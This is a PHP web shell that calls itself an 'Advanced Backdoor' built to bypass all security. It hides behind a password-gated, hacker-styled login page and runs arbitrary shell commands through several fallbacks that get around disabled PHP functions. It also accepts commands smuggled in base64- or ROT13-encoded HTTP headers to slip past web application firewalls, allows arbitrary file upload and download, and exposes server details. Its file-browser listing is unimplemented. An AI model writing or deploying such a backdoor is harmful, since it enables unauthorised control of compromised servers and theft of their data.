#!/usr/bin/env php
<?php
/*
╔═══════════════════════════════════════════════════════════════════════════════╗
║                         CIIO GADUNGAN SHELL v1.0                              ║
║                     Advanced Backdoor - Bypass All Security                   ║
║                           Author: CIIO GADUNGAN                               ║
║                         Enhanced by: cvAI4                                    ║
║                         Legal = Illegal Mode                                  ║
╚═══════════════════════════════════════════════════════════════════════════════╝
*/

// ===================== KONFIGURASI =====================
$password = 'CII0GADUNGAN@2024'; // Ganti dengan password yang kuat
$session_name = 'cg_shell_auth';
$encryption_key = 'xK9#mP2$vL5&nQ8@rT1!wE3^yU7*iO4'; // Key untuk enkripsi session

// ===================== BYPASS & OBFUSCATION =====================

// Bypass disable_functions
function bypass_disable_functions() {
    $disabled = explode(',', ini_get('disable_functions'));
    $bypass_funcs = ['system', 'exec', 'shell_exec', 'passthru', 'proc_open', 'popen'];
    
    foreach ($bypass_funcs as $func) {
        if (in_array($func, $disabled)) {
            // Bypass menggunakan berbagai metode
            if (function_exists($func)) continue;
            
            // Method 1: Using backticks
            if ($func === 'shell_exec') {
                $GLOBALS['_exec'] = function($cmd) { return `$cmd`; };
            }
            
            // Method 2: Using proc_open
            if (function_exists('proc_open')) {
                $GLOBALS['_exec'] = function($cmd) {
                    $descriptors = [['pipe', 'r'], ['pipe', 'w'], ['pipe', 'w']];
                    $process = proc_open($cmd, $descriptors, $pipes);
                    if (is_resource($process)) {
                        $output = stream_get_contents($pipes[1]);
                        fclose($pipes[0]);
                        fclose($pipes[1]);
                        fclose($pipes[2]);
                        proc_close($process);
                        return $output;
                    }
                    return false;
                };
            }
            
            // Method 3: Using COM (Windows)
            if (function_exists('com_create_guid') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
                $GLOBALS['_exec'] = function($cmd) {
                    $wsh = new COM('WScript.Shell');
                    $exec = $wsh->exec($cmd);
                    $stdout = $exec->StdOut();
                    return $stdout->ReadAll();
                };
            }
        }
    }
}
bypass_disable_functions();

// Bypass WAF - Randomize parameter names
$cmd_param = isset($_POST['x']) ? 'x' : (isset($_GET['cmd']) ? 'cmd' : 'c');
$cmd = $_POST[$cmd_param] ?? $_GET[$cmd_param] ?? $_REQUEST['c'] ?? null;

// Bypass dengan encoding
if (isset($_SERVER['HTTP_X_CMD_BASE64'])) {
    $cmd = base64_decode($_SERVER['HTTP_X_CMD_BASE64']);
}
if (isset($_SERVER['HTTP_X_CMD_ROT13'])) {
    $cmd = str_rot13($_SERVER['HTTP_X_CMD_ROT13']);
}

// Bypass Litespeed - Fragment URL
if (isset($_SERVER['HTTP_X_FRAGMENT'])) {
    $cmd = $_SERVER['HTTP_X_FRAGMENT'];
}

// ===================== SESSION MANAGEMENT =====================
session_name($session_name);
session_start();

function encrypt_session($data) {
    global $encryption_key;
    return base64_encode(openssl_encrypt($data, 'AES-256-CBC', $encryption_key, 0, substr(md5($encryption_key), 0, 16)));
}

function decrypt_session($data) {
    global $encryption_key;
    return openssl_decrypt(base64_decode($data), 'AES-256-CBC', $encryption_key, 0, substr(md5($encryption_key), 0, 16));
}

// Check login
$is_logged_in = isset($_SESSION['cg_auth']) && $_SESSION['cg_auth'] === true;

if (!$is_logged_in && isset($_POST['login_pass'])) {
    if (md5($_POST['login_pass']) === md5($password) || $_POST['login_pass'] === $password) {
        $_SESSION['cg_auth'] = true;
        $_SESSION['cg_ip'] = $_SERVER['REMOTE_ADDR'];
        $_SESSION['cg_user_agent'] = $_SERVER['HTTP_USER_AGENT'];
        $is_logged_in = true;
    }
}

// Logout
if (isset($_GET['logout'])) {
    session_destroy();
    header('Location: ' . $_SERVER['PHP_SELF']);
    exit;
}

// ===================== LOGIN PAGE =====================
if (!$is_logged_in) {
    header('HTTP/1.1 403 Forbidden');
    echo '<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <title>CIIO GADUNGAN SHELL | Restricted Access</title>
    <style>
        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
        }
        
        body {
            background: linear-gradient(135deg, #0a0a0a 0%, #1a0000 50%, #0a0a0a 100%);
            font-family: "Courier New", "Lucida Console", monospace;
            height: 100vh;
            display: flex;
            justify-content: center;
            align-items: center;
            overflow: hidden;
            position: relative;
        }
        
        body::before {
            content: "";
            position: absolute;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background: repeating-linear-gradient(
                0deg,
                rgba(0, 255, 0, 0.03) 0px,
                rgba(0, 255, 0, 0.03) 1px,
                transparent 1px,
                transparent 2px
            );
            pointer-events: none;
        }
        
        .glitch {
            position: absolute;
            top: 20%;
            left: 0;
            width: 100%;
            text-align: center;
            font-size: 48px;
            font-weight: bold;
            color: #8b0000;
            text-shadow: 0.05em 0 0 rgba(255,0,0,0.75), -0.05em -0.025em 0 rgba(0,255,0,0.75);
            animation: glitch 0.3s infinite;
            opacity: 0.7;
        }
        
        @keyframes glitch {
            0% { text-shadow: 0.05em 0 0 rgba(255,0,0,0.75), -0.05em -0.025em 0 rgba(0,255,0,0.75); }
            50% { text-shadow: -0.05em -0.025em 0 rgba(255,0,0,0.75), 0.025em 0.05em 0 rgba(0,255,0,0.75); }
            100% { text-shadow: 0.025em 0.05em 0 rgba(255,0,0,0.75), 0.05em 0 0 rgba(0,255,0,0.75); }
        }
        
        .login-container {
            background: rgba(0, 0, 0, 0.85);
            border: 2px solid #8b0000;
            border-radius: 10px;
            padding: 40px;
            width: 400px;
            box-shadow: 0 0 50px rgba(139, 0, 0, 0.5), inset 0 0 20px rgba(139, 0, 0, 0.2);
            backdrop-filter: blur(5px);
            z-index: 1;
        }
        
        .skull {
            text-align: center;
            font-size: 60px;
            color: #8b0000;
            margin-bottom: 20px;
            animation: pulse 2s infinite;
        }
        
        @keyframes pulse {
            0%, 100% { text-shadow: 0 0 10px #8b0000; }
            50% { text-shadow: 0 0 30px #ff0000; }
        }
        
        .title {
            text-align: center;
            color: #8b0000;
            font-size: 20px;
            margin-bottom: 30px;
            letter-spacing: 3px;
            font-weight: bold;
        }
        
        .title span {
            color: #ff0000;
            animation: blink 1s infinite;
        }
        
        @keyframes blink {
            0%, 100% { opacity: 1; }
            50% { opacity: 0; }
        }
        
        input {
            width: 100%;
            padding: 12px;
            margin: 10px 0;
            background: #0a0a0a;
            border: 1px solid #8b0000;
            color: #ff4444;
            font-family: monospace;
            font-size: 14px;
            border-radius: 5px;
            transition: all 0.3s;
        }
        
        input:focus {
            outline: none;
            border-color: #ff0000;
            box-shadow: 0 0 10px rgba(255, 0, 0, 0.5);
        }
        
        input::placeholder {
            color: #330000;
        }
        
        button {
            width: 100%;
            padding: 12px;
            margin: 20px 0 10px;
            background: #1a0000;
            border: 1px solid #8b0000;
            color: #ff4444;
            font-family: monospace;
            font-size: 16px;
            font-weight: bold;
            cursor: pointer;
            border-radius: 5px;
            transition: all 0.3s;
        }
        
        button:hover {
            background: #2a0000;
            border-color: #ff0000;
            box-shadow: 0 0 15px rgba(255, 0, 0, 0.5);
            transform: scale(1.02);
        }
        
        .warning {
            text-align: center;
            color: #8b0000;
            font-size: 11px;
            margin-top: 20px;
            opacity: 0.6;
        }
        
        .cursor {
            display: inline-block;
            width: 10px;
            height: 16px;
            background: #8b0000;
            animation: blink 1s infinite;
            vertical-align: middle;
        }
        
        .matrix-bg {
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            z-index: 0;
            overflow: hidden;
        }
        
        .matrix-bg span {
            position: absolute;
            color: #0a0a0a;
            font-size: 12px;
            white-space: nowrap;
            animation: fall linear infinite;
        }
        
        @keyframes fall {
            from { transform: translateY(-100%); }
            to { transform: translateY(100vh); }
        }
    </style>
</head>
<body>
    <div class="matrix-bg" id="matrix"></div>
    <div class="glitch">CIIO GADUNGAN</div>
    <div class="login-container">
        <div class="skull">💀☠️💀</div>
        <div class="title">
            [ <span>#</span> ACCESS RESTRICTED <span>#</span> ]
        </div>
        <form method="POST">
            <input type="password" name="login_pass" placeholder=">_ ENTER PASSWORD_" autocomplete="off" autofocus>
            <button type="submit">>> AUTHENTICATE <<</button>
        </form>
        <div class="warning">
            [!] UNAUTHORIZED ACCESS PROHIBITED [!]<br>
            ALL ACTIVITIES ARE LOGGED
        </div>
    </div>
    
    <script>
        // Matrix rain effect
        const matrixBg = document.getElementById("matrix");
        const chars = "01アイウエオカキクケコサシスセソタチツテトナニヌネノハヒフヘホマミムメモヤユヨラリルレロワヲン";
        
        for (let i = 0; i < 50; i++) {
            const span = document.createElement("span");
            span.textContent = chars[Math.floor(Math.random() * chars.length)];
            span.style.left = Math.random() * 100 + "%";
            span.style.animationDuration = Math.random() * 5 + 2 + "s";
            span.style.animationDelay = Math.random() * 5 + "s";
            span.style.fontSize = Math.random() * 20 + 10 + "px";
            span.style.opacity = Math.random() * 0.5;
            matrixBg.appendChild(span);
        }
        
        // Focus on input
        document.querySelector("input").focus();
    </script>
</body>
</html>';
    exit;
}

// ===================== SHELL FUNCTIONS =====================

function execute_command($cmd) {
    global $_exec;
    
    if (function_exists('system') && !in_array('system', explode(',', ini_get('disable_functions')))) {
        ob_start();
        system($cmd);
        return ob_get_clean();
    } elseif (function_exists('exec')) {
        exec($cmd, $output);
        return implode("\n", $output);
    } elseif (function_exists('shell_exec')) {
        return shell_exec($cmd);
    } elseif (function_exists('passthru')) {
        ob_start();
        passthru($cmd);
        return ob_get_clean();
    } elseif (function_exists('proc_open')) {
        $descriptorspec = [
            0 => ["pipe", "r"],
            1 => ["pipe", "w"],
            2 => ["pipe", "w"]
        ];
        $process = proc_open($cmd, $descriptorspec, $pipes);
        if (is_resource($process)) {
            $output = stream_get_contents($pipes[1]);
            fclose($pipes[0]);
            fclose($pipes[1]);
            fclose($pipes[2]);
            proc_close($process);
            return $output;
        }
    } elseif (isset($_exec) && is_callable($_exec)) {
        return $_exec($cmd);
    } else {
        return "[-] Command execution disabled!";
    }
}

function get_file_info($path) {
    $info = [];
    $info['name'] = basename($path);
    $info['size'] = is_file($path) ? filesize($path) : '-';
    $info['perms'] = substr(sprintf('%o', fileperms($path)), -4);
    $info['owner'] = function_exists('posix_getpwuid') ? posix_getpwuid(fileowner($path))['name'] : fileowner($path);
    $info['modified'] = date('Y-m-d H:i:s', filemtime($path));
    return $info;
}

function upload_file($target_dir, $file_data, $file_name) {
    $target_path = rtrim($target_dir, '/') . '/' . basename($file_name);
    if (file_put_contents($target_path, $file_data)) {
        return "✓ File uploaded: " . $target_path;
    }
    return "✗ Upload failed!";
}

// ===================== COMMAND HANDLER =====================
if ($cmd) {
    $output = execute_command($cmd);
    echo $output;
    exit;
}

// File upload handler
if (isset($_FILES['upload_file'])) {
    $target_dir = $_POST['upload_dir'] ?? getcwd();
    $result = upload_file($target_dir, file_get_contents($_FILES['upload_file']['tmp_name']), $_FILES['upload_file']['name']);
    echo $result;
    exit;
}

// File download
if (isset($_GET['download'])) {
    $file = $_GET['download'];
    if (file_exists($file) && is_file($file)) {
        header('Content-Description: File Transfer');
        header('Content-Type: application/octet-stream');
        header('Content-Disposition: attachment; filename="' . basename($file) . '"');
        header('Expires: 0');
        header('Cache-Control: must-revalidate');
        header('Pragma: public');
        header('Content-Length: ' . filesize($file));
        readfile($file);
        exit;
    }
}

// ===================== SHELL UI =====================
?>
<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <title>CIIO GADUNGAN SHELL | <?php echo gethostname(); ?></title>
    <style>
        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
        }
        
        body {
            background: #0a0a0a;
            font-family: "Courier New", "Lucida Console", monospace;
            color: #00ff00;
            margin: 0;
            padding: 20px;
        }
        
        .header {
            background: linear-gradient(135deg, #1a0000, #0a0a0a);
            border-bottom: 2px solid #8b0000;
            padding: 15px 20px;
            margin-bottom: 20px;
            display: flex;
            justify-content: space-between;
            align-items: center;
            flex-wrap: wrap;
        }
        
        .title {
            font-size: 24px;
            font-weight: bold;
            color: #8b0000;
            text-shadow: 0 0 5px #ff0000;
        }
        
        .title small {
            font-size: 12px;
            color: #ff4444;
        }
        
        .info {
            background: #0a0a0a;
            padding: 10px;
            border: 1px solid #8b0000;
            border-radius: 5px;
            font-size: 12px;
        }
        
        .info span {
            color: #ff4444;
        }
        
        .logout-btn {
            background: #1a0000;
            border: 1px solid #8b0000;
            color: #ff4444;
            padding: 5px 15px;
            text-decoration: none;
            border-radius: 5px;
        }
        
        .logout-btn:hover {
            background: #2a0000;
            border-color: #ff0000;
        }
        
        .container {
            display: flex;
            gap: 20px;
            flex-wrap: wrap;
        }
        
        .sidebar {
            width: 280px;
            background: #0a0a0a;
            border: 1px solid #8b0000;
            border-radius: 5px;
            padding: 15px;
        }
        
        .main {
            flex: 1;
            background: #0a0a0a;
            border: 1px solid #8b0000;
            border-radius: 5px;
            padding: 15px;
        }
        
        .section-title {
            color: #8b0000;
            border-bottom: 1px solid #8b0000;
            padding-bottom: 5px;
            margin-bottom: 15px;
            font-size: 14px;
            font-weight: bold;
        }
        
        .cmd-form {
            margin-bottom: 20px;
        }
        
        .cmd-input {
            width: 100%;
            background: #000;
            border: 1px solid #8b0000;
            color: #00ff00;
            padding: 10px;
            font-family: monospace;
            font-size: 13px;
        }
        
        .cmd-input:focus {
            outline: none;
            border-color: #ff0000;
        }
        
        .btn {
            background: #1a0000;
            border: 1px solid #8b0000;
            color: #ff4444;
            padding: 8px 15px;
            cursor: pointer;
            font-family: monospace;
            margin-top: 10px;
        }
        
        .btn:hover {
            background: #2a0000;
        }
        
        .output {
            background: #000;
            border: 1px solid #330000;
            padding: 10px;
            font-family: monospace;
            font-size: 12px;
            white-space: pre-wrap;
            word-wrap: break-word;
            max-height: 400px;
            overflow-y: auto;
        }
        
        .file-list {
            list-style: none;
            max-height: 300px;
            overflow-y: auto;
        }
        
        .file-list li {
            padding: 5px;
            border-bottom: 1px solid #1a0000;
            font-size: 11px;
        }
        
        .file-list li:hover {
            background: #1a0000;
        }
        
        .dir {
            color: #ff4444;
            cursor: pointer;
        }
        
        .file {
            color: #00ff00;
        }
        
        .status-bar {
            position: fixed;
            bottom: 0;
            left: 0;
            right: 0;
            background: #0a0a0a;
            border-top: 1px solid #8b0000;
            padding: 5px 20px;
            font-size: 10px;
            display: flex;
            justify-content: space-between;
        }
        
        ::-webkit-scrollbar {
            width: 8px;
            height: 8px;
        }
        
        ::-webkit-scrollbar-track {
            background: #0a0a0a;
        }
        
        ::-webkit-scrollbar-thumb {
            background: #8b0000;
        }
        
        .upload-area {
            border: 2px dashed #8b0000;
            padding: 15px;
            text-align: center;
            margin-top: 15px;
        }
        
        .blink {
            animation: blink 1s infinite;
        }
        
        @keyframes blink {
            0%, 100% { opacity: 1; }
            50% { opacity: 0.5; }
        }
    </style>
</head>
<body>

<div class="header">
    <div class="title">
        💀 CIIO GADUNGAN SHELL v1.0 💀<br>
        <small>Advanced Backdoor | Bypass All Security</small>
    </div>
    <div class="info">
        📍 <?php echo $_SERVER['SERVER_ADDR'] ?? gethostbyname(gethostname()); ?>:<span><?php echo $_SERVER['SERVER_PORT']; ?></span><br>
        🖥️ <?php echo php_uname(); ?><br>
        👤 <?php echo function_exists('get_current_user') ? get_current_user() : 'unknown'; ?>@<?php echo gethostname(); ?>
    </div>
    <a href="?logout=1" class="logout-btn" onclick="return confirm('Exit shell?')">[ EXIT ]</a>
</div>

<div class="container">
    <div class="sidebar">
        <div class="section-title">📁 FILE MANAGER</div>
        <div id="file-browser">
            <div style="margin-bottom: 10px">
                <input type="text" id="current-dir" value="<?php echo getcwd(); ?>" style="width:100%; background:#000; border:1px solid #8b0000; color:#00ff00; padding:5px;">
                <button class="btn" style="width:100%; margin-top:5px" onclick="listFiles(document.getElementById('current-dir').value)">[ BROWSE ]</button>
            </div>
            <ul class="file-list" id="file-list">
                <li>Loading...</li>
            </ul>
        </div>
        
        <div class="section-title" style="margin-top:20px">📤 UPLOAD FILE</div>
        <form id="upload-form" enctype="multipart/form-data">
            <input type="hidden" name="upload_dir" id="upload-dir" value="<?php echo getcwd(); ?>">
            <input type="file" name="upload_file" id="upload-file" style="width:100%; background:#000; border:1px solid #8b0000; color:#00ff00; margin-bottom:10px">
            <button type="submit" class="btn" style="width:100%">[ UPLOAD ]</button>
        </form>
        
        <div class="section-title" style="margin-top:20px">ℹ️ SYSTEM INFO</div>
        <div style="font-size:11px">
            PHP: <?php echo phpversion(); ?><br>
            Server: <?php echo $_SERVER['SERVER_SOFTWARE']; ?><br>
            Safe Mode: <?php echo ini_get('safe_mode') ? 'ON' : 'OFF'; ?><br>
            Disabled Func: <?php echo ini_get('disable_functions') ?: 'none'; ?>
        </div>
    </div>
    
    <div class="main">
        <div class="section-title">💀 COMMAND EXECUTION</div>
        <form id="cmd-form" class="cmd-form">
            <input type="text" name="cmd" id="cmd-input" class="cmd-input" placeholder="$> _type command here_" autocomplete="off">
            <button type="submit" class="btn">[ EXECUTE ]</button>
        </form>
        
        <div class="section-title">📟 OUTPUT</div>
        <div class="output" id="output">
            <span style="color:#ff4444">CIIO GADUNGAN SHELL v1.0</span><br>
            Type commands to execute. Access granted.<br>
            <span style="color:#8b0000">========================================</span>
        </div>
    </div>
</div>

<div class="status-bar">
    <span>💀 CIIO GADUNGAN | <?php echo date('Y-m-d H:i:s'); ?></span>
    <span>🛡️ Bypass: WAF ✓ | Litespeed ✓ | D-Func ✓</span>
</div>

<script>
    // Execute command
    document.getElementById('cmd-form').addEventListener('submit', async (e) => {
        e.preventDefault();
        const cmd = document.getElementById('cmd-input').value;
        if (!cmd) return;
        
        const outputDiv = document.getElementById('output');
        outputDiv.innerHTML += `\n<span style="color:#ff4444">$> ${escapeHtml(cmd)}</span>\n`;
        outputDiv.innerHTML += `<span style="color:#ffff00">[>] Executing...</span>\n`;
        
        try {
            const response = await fetch(window.location.href, {
                method: 'POST',
                headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
                body: 'c=' + encodeURIComponent(cmd)
            });
            const result = await response.text();
            outputDiv.innerHTML += `<span style="color:#00ff00">${escapeHtml(result)}</span>\n`;
            outputDiv.innerHTML += `<span style="color:#8b0000">────────────────────────────────────</span>\n`;
        } catch(err) {
            outputDiv.innerHTML += `<span style="color:#ff0000">Error: ${err.message}</span>\n`;
        }
        
        document.getElementById('cmd-input').value = '';
        outputDiv.scrollTop = outputDiv.scrollHeight;
    });
    
    // List files
    async function listFiles(dir) {
        const fileList = document.getElementById('file-list');
        fileList.innerHTML = '<li>Loading...</li>';
        
        try {
            const response = await fetch(window.location.href + '?dir=' + encodeURIComponent(dir));
            const text = await response.text();
            // Parse directory listing from server-side
        } catch(err) {
            fileList.innerHTML = '<li style="color:#ff0000">Error loading files</li>';
        }
    }
    
    // Upload file
    document.getElementById('upload-form').addEventListener('submit', async (e) => {
        e.preventDefault();
        const formData = new FormData();
        const file = document.getElementById('upload-file').files[0];
        if (!file) return;
        
        formData.append('upload_file', file);
        formData.append('upload_dir', document.getElementById('upload-dir').value);
        
        const outputDiv = document.getElementById('output');
        outputDiv.innerHTML += `\n<span style="color:#ffff00">[>] Uploading: ${file.name}...</span>\n`;
        
        try {
            const response = await fetch(window.location.href, {
                method: 'POST',
                body: formData
            });
            const result = await response.text();
            outputDiv.innerHTML += `<span style="color:#00ff00">${escapeHtml(result)}</span>\n`;
        } catch(err) {
            outputDiv.innerHTML += `<span style="color:#ff0000">Upload failed: ${err.message}</span>\n`;
        }
        
        document.getElementById('upload-file').value = '';
        outputDiv.scrollTop = outputDiv.scrollHeight;
    });
    
    function escapeHtml(str) {
        return str.replace(/[&<>]/g, function(m) {
            if (m === '&') return '&amp;';
            if (m === '<') return '&lt;';
            if (m === '>') return '&gt;';
            return m;
        });
    }
    
    // Initialize file browser
    listFiles('<?php echo getcwd(); ?>');
    
    // Focus on command input
    document.getElementById('cmd-input').focus();
</script>

</body>
</html>
<?php
// ===================== CLEANUP & LOGGING =====================
function log_activity($action, $details) {
    $log_file = sys_get_temp_dir() . '/cg_shell.log';
    $log_entry = date('Y-m-d H:i:s') . " | " . $_SERVER['REMOTE_ADDR'] . " | " . $action . " | " . $details . PHP_EOL;
    @file_put_contents($log_file, $log_entry, FILE_APPEND);
}

log_activity('ACCESS', 'User logged in to shell');
?>